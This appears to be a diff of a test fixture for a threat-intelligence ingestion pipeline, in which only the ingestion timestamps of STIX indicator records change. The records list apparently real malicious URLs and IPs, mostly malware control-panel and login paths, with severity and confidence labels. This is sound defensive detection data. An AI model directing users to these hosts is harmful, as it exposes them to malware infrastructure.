@@ -12815,7 +12815,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024032700Z", + "ingested": "2021-12-14T14:57:43.118270710Z", "original": "{\"created\":\"2020-02-01T02:08:09.833Z\",\"description\":\"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:08:09.833Z\",\"name\":\"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.833Z\"}", "category": "threat", "type": "indicator", @@ -12867,7 +12867,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024040100Z", + "ingested": "2021-12-14T14:57:43.118271097Z", "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", "category": "threat", "type": "indicator", 
@@ -12912,7 +12912,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024047200Z", + "ingested": "2021-12-14T14:57:43.118271596Z", "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", "category": "threat", "type": "indicator", @@ -12957,7 +12957,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024051300Z", + "ingested": "2021-12-14T14:57:43.118272024Z", "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", "category": "threat", "type": "indicator", 
@@ -13009,7 +13009,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024056600Z", + "ingested": "2021-12-14T14:57:43.118272486Z", "original": "{\"created\":\"2020-02-01T02:08:42.76Z\",\"description\":\"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-01T02:08:42.76Z\",\"name\":\"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:42.76Z\"}", "category": "threat", "type": "indicator", @@ -13061,7 +13061,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024061900Z", + "ingested": "2021-12-14T14:57:43.118272922Z", "original": "{\"created\":\"2020-02-01T02:09:05.295Z\",\"description\":\"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3639e6da-8159-4dd6-b928-b8189c29159f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:09:05.295Z\",\"name\":\"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:05.295Z\"}", "category": "threat", "type": "indicator", 
@@ -13112,7 +13112,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024067600Z", + "ingested": "2021-12-14T14:57:43.118273409Z", "original": "{\"created\":\"2020-02-01T02:09:13.398Z\",\"description\":\"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:09:13.398Z\",\"name\":\"mal_url: http://moonberry.pk/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moonberry.pk/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:13.398Z\"}", "category": "threat", "type": "indicator", @@ -13164,7 +13164,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024071500Z", + "ingested": "2021-12-14T14:57:43.118273814Z", "original": "{\"created\":\"2020-02-01T02:09:49.804Z\",\"description\":\"TS ID: 55277442688; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--0f2bf75c-d534-48e9-a25f-940cc5f673ed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:09:49.804Z\",\"name\":\"mal_url: http://207.246.67.4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://207.246.67.4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:49.804Z\"}", "category": "threat", "type": "indicator", 
@@ -13216,7 +13216,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024077200Z", + "ingested": "2021-12-14T14:57:43.118274270Z", "original": "{\"created\":\"2020-02-01T02:09:56.524Z\",\"description\":\"TS ID: 55277443239; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0cdef192-7b00-48b1-b8d4-a9642e37d630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:09:56.524Z\",\"name\":\"mal_url: http://farzanatradings.com/odogwu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/odogwu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:56.524Z\"}", "category": "threat", "type": "indicator", @@ -13268,7 +13268,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024081400Z", + "ingested": "2021-12-14T14:57:43.118274778Z", "original": "{\"created\":\"2020-02-01T02:10:00.889Z\",\"description\":\"TS ID: 55277443489; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--e409b749-d733-4b69-83cf-4df74ac8fd2b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:10:00.889Z\",\"name\":\"mal_url: http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:00.889Z\"}", "category": "threat", "type": "indicator", 
@@ -13320,7 +13320,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024085900Z", + "ingested": "2021-12-14T14:57:43.118275214Z", "original": "{\"created\":\"2020-02-01T02:10:04.196Z\",\"description\":\"TS ID: 55277443402; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--347a1f39-78c4-4f71-b125-decaba2489b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.196Z\",\"name\":\"mal_url: http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.196Z\"}", "category": "threat", "type": "indicator", @@ -13372,7 +13372,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024089400Z", + "ingested": "2021-12-14T14:57:43.118275676Z", "original": "{\"created\":\"2020-02-01T02:10:04.234Z\",\"description\":\"TS ID: 55277443231; iType: mal_url; State: active; Org: Fornex Hosting S.L.; Source: CyberCrime\",\"id\":\"indicator--acd84a21-6112-4bbb-9132-fa50a9b7b07c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.234Z\",\"name\":\"mal_url: http://nextbridge.info/god/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nextbridge.info/god/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:04.234Z\"}", "category": "threat", "type": "indicator", 
@@ -13424,7 +13424,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024094700Z", + "ingested": "2021-12-14T14:57:43.118276114Z", "original": "{\"created\":\"2020-02-01T02:10:18.897Z\",\"description\":\"TS ID: 55277442692; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--d2990eea-f233-4296-b7ea-dc78ad48f1a3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-01T02:10:18.897Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:18.897Z\"}", "category": "threat", "type": "indicator", @@ -13476,7 +13476,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024100500Z", + "ingested": "2021-12-14T14:57:43.118276687Z", "original": "{\"created\":\"2020-02-01T02:10:19.383Z\",\"description\":\"TS ID: 55277443285; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ca6a96b9-60e6-429f-9223-7009c1a5e164\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:10:19.383Z\",\"name\":\"mal_url: http://corpcougar.com/collins/32/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/collins/32/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.383Z\"}", "category": "threat", "type": "indicator", 
@@ -13521,7 +13521,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024106700Z", + "ingested": "2021-12-14T14:57:43.118277142Z", "original": "{\"created\":\"2020-02-01T02:10:19.417Z\",\"description\":\"TS ID: 55277443195; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--1339e0b5-4398-4de4-9175-e685b6d0f5a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:10:19.417Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:19.417Z\"}", "category": "threat", "type": "indicator", @@ -13573,7 +13573,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024114200Z", + "ingested": "2021-12-14T14:57:43.118277527Z", "original": "{\"created\":\"2020-02-01T02:10:39.062Z\",\"description\":\"TS ID: 55277443225; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--5a37e909-b130-4f49-b1d5-f4645a9d4c21\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-01T02:10:39.062Z\",\"name\":\"mal_url: http://pom4ekk.myjino.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pom4ekk.myjino.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:39.062Z\"}", "category": "threat", "type": "indicator", 
@@ -13624,7 +13624,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024121400Z", + "ingested": "2021-12-14T14:57:43.118277970Z", "original": "{\"created\":\"2020-02-01T02:10:42.316Z\",\"description\":\"TS ID: 55277443198; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--9c6caf78-5bcd-4f6f-bc0f-d094a027a811\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-01T02:10:42.316Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:42.316Z\"}", "category": "threat", "type": "indicator", @@ -13676,7 +13676,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024128600Z", + "ingested": "2021-12-14T14:57:43.118278435Z", "original": "{\"created\":\"2020-02-01T02:11:07.132Z\",\"description\":\"TS ID: 55277443508; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--d5f6e0de-d0bb-48f9-931d-5f4fd725a712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:07.132Z\",\"name\":\"mal_url: http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.132Z\"}", "category": "threat", "type": "indicator", 
@@ -13728,7 +13728,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024135800Z", + "ingested": "2021-12-14T14:57:43.118278889Z", "original": "{\"created\":\"2020-02-01T02:11:07.159Z\",\"description\":\"TS ID: 55277443305; iType: mal_url; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--d2ef46a3-6df2-4cc9-bb15-886dc24d41e5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:11:07.159Z\",\"name\":\"mal_url: http://betprognoz.pro/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://betprognoz.pro/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:07.159Z\"}", "category": "threat", "type": "indicator", @@ -13779,7 +13779,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024142800Z", + "ingested": "2021-12-14T14:57:43.118279316Z", "original": "{\"created\":\"2020-02-01T02:11:33.332Z\",\"description\":\"TS ID: 55277443141; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--6c50f1f6-c27a-4484-ac53-728654ba2db3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:33.332Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:33.332Z\"}", "category": "threat", "type": "indicator", 
@@ -13831,7 +13831,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024150Z", + "ingested": "2021-12-14T14:57:43.118279760Z", "original": "{\"created\":\"2020-02-01T02:11:40.48Z\",\"description\":\"TS ID: 55277443247; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ede31398-e157-401a-9362-127f5c5983ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:11:40.48Z\",\"name\":\"mal_url: http://farzanatradings.com/fakedon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/fakedon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:40.48Z\"}", "category": "threat", "type": "indicator", @@ -13882,7 +13882,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024157100Z", + "ingested": "2021-12-14T14:57:43.118280205Z", "original": "{\"created\":\"2020-02-01T02:11:41.88Z\",\"description\":\"TS ID: 55277443064; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--297cf29f-42ad-44ac-9f04-5156899d5ce9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:41.88Z\",\"name\":\"mal_url: http://q74722vp.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://q74722vp.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:41.88Z\"}", "category": "threat", "type": "indicator", 
@@ -13934,7 +13934,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024164200Z", + "ingested": "2021-12-14T14:57:43.118280643Z", "original": "{\"created\":\"2020-02-02T01:57:18.343Z\",\"description\":\"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:18.343Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.343Z\"}", "category": "threat", "type": "indicator", @@ -13986,7 +13986,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024189Z", + "ingested": "2021-12-14T14:57:43.118281310Z", "original": "{\"created\":\"2020-02-02T01:57:18.366Z\",\"description\":\"TS ID: 55280666642; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--7470705a-310f-4fe9-9c2f-02b5eac2ff94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:18.366Z\",\"name\":\"mal_url: http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.366Z\"}", "category": "threat", "type": "indicator", 
@@ -14037,7 +14037,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024195700Z", + "ingested": "2021-12-14T14:57:43.118281793Z", "original": "{\"created\":\"2020-02-02T01:57:18.451Z\",\"description\":\"TS ID: 55280666607; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--20860e18-16e7-4a9a-a485-7588aaee909b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.451Z\",\"name\":\"mal_url: http://calmingvapors.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://calmingvapors.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.451Z\"}", "category": "threat", "type": "indicator", @@ -14089,7 +14089,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024199100Z", + "ingested": "2021-12-14T14:57:43.118283611Z", "original": "{\"created\":\"2020-02-02T01:57:18.605Z\",\"description\":\"TS ID: 55280666626; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--6d90d2cb-9fc8-43a4-b4c0-d9ab027f2268\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.605Z\",\"name\":\"mal_url: http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.605Z\"}", "category": "threat", "type": "indicator", 
@@ -14141,7 +14141,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024204300Z", + "ingested": "2021-12-14T14:57:43.118284117Z", "original": "{\"created\":\"2020-02-02T01:57:19.047Z\",\"description\":\"TS ID: 55280666671; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--ffc26af5-40e7-4157-9d15-cf6048ef86a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:19.047Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.047Z\"}", "category": "threat", "type": "indicator", @@ -14192,7 +14192,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024209600Z", + "ingested": "2021-12-14T14:57:43.118284592Z", "original": "{\"created\":\"2020-02-02T01:57:19.068Z\",\"description\":\"TS ID: 55280666596; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5c4cfe56-5fda-4c2b-9b8c-3d384988c3ac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:57:19.068Z\",\"name\":\"mal_url: http://f0392879.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392879.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.068Z\"}", "category": "threat", "type": "indicator", 
@@ -14244,7 +14244,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024215700Z", + "ingested": "2021-12-14T14:57:43.118285029Z", "original": "{\"created\":\"2020-02-02T01:57:25.701Z\",\"description\":\"TS ID: 55280666633; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8fdc4cfc-1312-4f6c-99ce-3a0a582a07d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-02T01:57:25.701Z\",\"name\":\"mal_url: http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.701Z\"}", "category": "threat", "type": "indicator", @@ -14296,7 +14296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024219500Z", + "ingested": "2021-12-14T14:57:43.118285518Z", "original": "{\"created\":\"2020-02-02T01:57:25.838Z\",\"description\":\"TS ID: 55280666656; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--9d8a164e-4f04-4ad2-a1a5-9c4dea319b97\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:25.838Z\",\"name\":\"mal_url: http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.838Z\"}", "category": "threat", "type": "indicator", 
@@ -14347,7 +14347,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024224800Z", + "ingested": "2021-12-14T14:57:43.118286298Z", "original": "{\"created\":\"2020-02-02T01:57:29.827Z\",\"description\":\"TS ID: 55280666597; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--001b0157-c446-40fd-8e01-136a2cab433f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-02T01:57:29.827Z\",\"name\":\"mal_url: http://f0391832.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391832.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:29.827Z\"}", "category": "threat", "type": "indicator", @@ -14398,7 +14398,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.024229400Z", + "ingested": "2021-12-14T14:57:43.118286747Z", "original": "{\"created\":\"2020-02-02T01:57:48.75Z\",\"description\":\"TS ID: 55280666598; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4c7c0429-b6f8-4376-8d84-18d68d212b34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:57:48.75Z\",\"name\":\"mal_url: http://f0391281.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391281.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:48.75Z\"}", "category": "threat", "type": "indicator", 
